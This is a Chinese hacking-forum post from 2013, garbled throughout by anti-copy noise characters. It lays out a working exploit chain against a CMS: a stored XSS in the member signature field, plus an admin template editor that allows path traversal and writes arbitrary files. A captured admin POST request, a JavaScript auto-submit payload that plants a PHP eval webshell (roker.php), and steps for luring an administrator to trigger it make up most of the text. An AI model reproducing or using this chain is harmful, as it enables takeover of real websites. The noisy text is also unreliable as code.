|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题% q$ k' ]6 V2 i' l& u" K% Q
官网已经修补了,所以重新下了源码6 T! j4 A# C+ N5 X. f" t% n/ Q4 h. O# O
因为 后台登入 还需要认证码 所以 注入就没看了。
7 f# S X! F$ ]* T存在 xss
4 b7 P$ D' Z& K) Q6 A: }+ C3 f漏洞文件 user/member/skin_edit.php
, H6 e$ E2 Z' Z% ]本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
1 I, c$ `- j$ ]; \; Y7 F 0 J/ [8 `5 E* ?
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>5 h: N( d: l, L
' B: R+ P7 l8 O6 Q</textarea></td></tr>& x1 |8 P9 ]5 u3 K5 S |
4 d1 r2 e) D2 U4 T8 u4 T+ n
user/do.php ' i5 ~- d; T) x( h9 V4 ^6 M; D
' X; M5 p" C# E! q0 H+ C# r
# v) \- i9 t* V6 uif($op=='zl'){ //资料1 m6 {& D, X! B0 O4 A* F6 B1 X* y
& ~- D: V, M( \6 g% }- g6 [ if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) : ~, q9 ?/ Z; v) a9 I6 x" M- }
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
5 H$ n j1 p7 k0 [9 D: W5 a Y D5 A w, i) p7 f
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
& D3 a0 H- w' [: \$ d- S 2 [+ V$ [# d6 f' U( ^/ ]9 f
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
+ H9 f* n( `1 R( h where CS_Name='".$cscms_name."'";
& I P) \- }" Q5 B
) ?/ o7 B f3 o$ [ if($db->query($sql)){
2 Q" O- a. p( X+ X: _ / L1 Y7 x) ]* g
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));7 g% M ?; x# k" |! V$ Q( O* V
& m% e. V n [8 u1 i
}else{
2 P6 B. u$ {6 c& M2 Y 9 S( Q" k2 r# ]) i c' O
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));' m- j+ X5 r1 g
! H+ y0 V$ h: y } @( S2 B0 G# K p
9 T. B. m8 C3 c8 b6 v3 f& k. i6 @. F, E. m, c W5 k
没有 过滤导致xss产生。
/ D$ t8 A( Z! G3 K2 H后台 看了下 很奇葩的是可以写任意格式文件。。
3 u) P. K7 p+ R0 u/ w/ u' A抓包。。
% ~/ ?1 \# ?3 G& z/ H! l; g
; @3 q1 |$ y# x* A! b
. G, q' N( ~, m, m# [0 ^本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
) u2 `7 a; C8 Z" f& T& O + I; w7 e1 o* h h8 j$ S% p7 @
Accept: text/html, application/xhtml+xml, */*
3 a- C$ P L) G8 G, F E! R o% H - y: ^7 s5 N) c& o
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php$ h4 z% M6 r3 l+ R
' m# Q3 D7 N' L* S( B( mAccept-Language: zh-CN( s& m- S& Q( k5 }5 ~4 c
# M+ d8 E! e+ V4 \- oUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)) U, l/ p+ l; J( o0 l
4 F7 X# ~( _2 f- ^) g2 E' j
Content-Type: application/x-www-form-urlencoded9 e4 o( O. Q1 e9 ?) J
: }5 Y7 `1 a. m2 V3 Z& `& y0 ?* n$ z
Accept-Encoding: gzip, deflate
* n7 N, Q% d" \! z% T
& g6 H; A4 W$ v0 z! S, LHost: 127.0.0.1
% ^2 j( T& w% f/ c r6 a
! N5 z* ` ]/ t' g) s. j6 p& {Content-Length: 38
- S) {- B& w) _: D 0 |/ ~% b3 l/ K- Q8 G3 u
DNT: 1' ~$ G& E# X+ ]% |. i
' f. d; j; S: M7 y' q5 c% r4 gConnection: Keep-Alive
) Y z' u! A9 R/ T % f3 L* J: W6 d) m! V: Z# x
Cache-Control: no-cache: e" M ^( q& P/ q; w+ F
4 |" {% X) ?. H; m1 RCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
+ l- U" s5 u! f6 U
c6 k2 A' { x
u( S6 d2 s) z! iname=aaa.php&content=%3Cs%3E%3Ca%25%3E t* _6 y! y. i
* }' x/ ?1 ~, b* F; S8 u
, y0 H% p: C; U& g( D* v$ N1 e
: Z% z' {! y+ q/ D7 s6 s
于是 构造js如下。1 L8 ?" x1 D7 f4 U$ E
) M; [( D. S _7 {% }1 g* u! ]本帖隐藏的内容<script>
/ d6 I* B' N/ j! D# ]thisTHost = top.location.hostname;
/ E( m! T. L! I4 ]) x7 m 3 e+ b2 N% X a; r* M6 w! X- n
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; Y4 Z0 G4 L: m( z( S* `& l4 K' d
8 C, y" q' R) @1 r# t1 E
function PostSubmit(url, data, msg) { ( m1 o0 A4 E: X2 O- [! g
var postUrl = url;2 b+ w) p1 h, L$ y1 n: ?* B
: w) u$ _# X/ j# Z. ]
var postData = data; / r. K4 Y O2 O
var msgData = msg; ( p6 ~) r$ C/ K% ?' o8 ~1 L
var ExportForm = document.createElement("FORM"); 5 u/ G$ D8 o$ Z; x- u& ^4 [# g- g
document.body.appendChild(ExportForm);
$ S) I7 {- e: a/ P3 Q3 T ExportForm.method = "POST"; , Q. K4 Y# N. c( D. [5 |
var newElement = document.createElement("input"); 7 J. B/ p. l7 |% ?; D! q" ? ^; _
newElement.setAttribute("name", "name");
- F4 C9 j5 g9 A, c" M" h newElement.setAttribute("type", "hidden"); " F, y1 k) H; z* |; r
var newElement2 = document.createElement("input"); , K( p- s7 X1 s; U2 n2 V, u
newElement2.setAttribute("name", "content"); 5 z% j! Y; t7 r& V$ a( Y4 B! _
newElement2.setAttribute("type", "hidden"); * r, p/ ?6 u$ M2 a
ExportForm.appendChild(newElement); ( Q9 P9 Z" @' P& d! n
ExportForm.appendChild(newElement2);
+ T) B7 ^5 \ D' ^4 ~. T9 {/ p newElement.value = postData;
6 L. i: M4 |8 f2 V7 S1 n newElement2.value = msgData; : a) ]% e8 B( r( }6 U5 c' j
ExportForm.action = postUrl;
( O! E) \2 Z- J- u# R ExportForm.submit();
: F& v* J4 r& j V, ]% S};
4 l' c5 s$ T- f6 S2 @4 u+ r
$ Y& b: ?2 `5 j$ E8 [- YPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
0 u+ U. l+ G, h: @/ y. E
6 x+ j1 K4 \4 u% u( o</script>/ z0 c! {/ l# S# K, D# j2 p
: M+ t# U9 }7 E$ i* X2 z
& X; ^; A6 H$ A: f5 R1 L+ p$ @# x2 G% A r( f
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
" I, W& i+ w6 ~1 n8 J) e用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)$ z5 \# \. [6 N- b: Q
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
& r+ c) g$ m1 t |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对